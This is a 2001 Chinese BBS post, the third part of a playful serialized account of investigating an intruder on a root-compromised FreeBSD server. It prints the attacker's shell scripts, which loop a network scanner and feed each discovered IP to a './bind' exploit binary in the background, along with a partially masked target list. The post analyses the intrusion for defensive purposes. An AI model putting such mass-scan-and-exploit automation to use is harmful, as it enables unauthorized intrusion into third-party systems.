发信人: melodies (明天就做窝), 信区: FreeBSD
标 题: 大战黑客纪实-3(转)
发信站: BBS 水木清华站 (Sun Jul 1 21:01:33 2001)
文章出处:北邮BBS
作者 clubk (快乐草包) 看板 FreeBSD
标题 大战黑客记实(3)
时间 Sun Apr 15 00:33:04 2001
———————————————————————————————————————
(续)
话说我等携了那些怪异官兵的全部资料回到大本营细细审问......首先是那些sh门下的,他们没有什么保密纪律可言, 一下就都招了
供词如下:
hack.sh: //当然了, 这个家伙的名字就够吸引人的
#!/bin/sh
# hach.sh, by
[email protected], xx-xx, xxxx
clear
tail -f hosts.log | while read TARGET
do
./dobind.sh $TARGET
done
############## End of hach.sh
原来只是个帮凶, 从hosts.log读出些东西来交给dobind.sh来处理
再看dobind.sh是何方神圣:
#!/bin/sh
# dobind.sh, by
[email protected], xx-xx, xxxx
/bind $1 <.hack &
exit 1
############## End of dobind.sh
有一点迷惑, 这个东东好像是对hosts.log来的什么参数作处理
到底是要干什么呢?.....不管它先, 看看另一个:
scan.sh: //SCAN???? 你要干什么??我好怕怕!!
#!/bin/sh
# scan.sh, by
[email protected], xx-xx, xxxx
while true //够狠的, 也不怕你的兵丁累死
do
ADDRESS=``./rundb``
sleep 100
killall bind 1>>/dev/null 2>>/dev/null3>>/dev/null
./scan $ADDRESS
done
############## End of scan.sh
最后一个是star.sh看来是他们的头儿:
#!/bin/sh
# star.sh, by
[email protected], xx-xx, xxxx
# Let''s go!
rm -rf bindname.log
touch bindname.log
nohup ./scan.sh >>/dev/null &
nohup ./hack.sh >>/dev/null &
############## End of star.sh
好吗, 看起来这可不是一个一般的江湖混混
早已取得系统的最高权限, 并在此安排了几个euid=root的""鼹鼠""
八成是一个黑道高手, 至少从他的这几个手下的水平来看是这样
不过奇怪的事怎么他没有悄悄换掉营中的几个心腹兵丁(ps, ls, etc)
让我们很容易的找到了他的蛛丝马迹,
那些躲在器械房(/dev)的可疑官兵也无所遁形
最后还有一些其他相关文件要看:
比如上面dobind.sh用到的hosts.log:
xxx.49.6.182
xxx.49.8.196
xxx.49.9.204
xxx.49.12.20
xxx.4.143.132
xxx.4.145.100
xxx.4.146.124
xxx.4.149.80
xxx.4.158.110
xxx.4.158.160
xxx.4.160.28
......
(处于安全的考虑, 此处隐去了地址的最高段)
全是江湖上的各个门派的所在(IP地址)....然后, 黑客打发在hack.sh中逐个取出地址打发手下bind.sh对付他们去了
这个hosts.log从哪里来的呢?
从star.sh看来, 只有scan.sh来做这件事了
那么就要看scan.sh调遣的兵丁rundb和scan了。可是这两个都是ELF 派的,
铁齿钢牙, 嘴不好撬啊....
(未完待续)''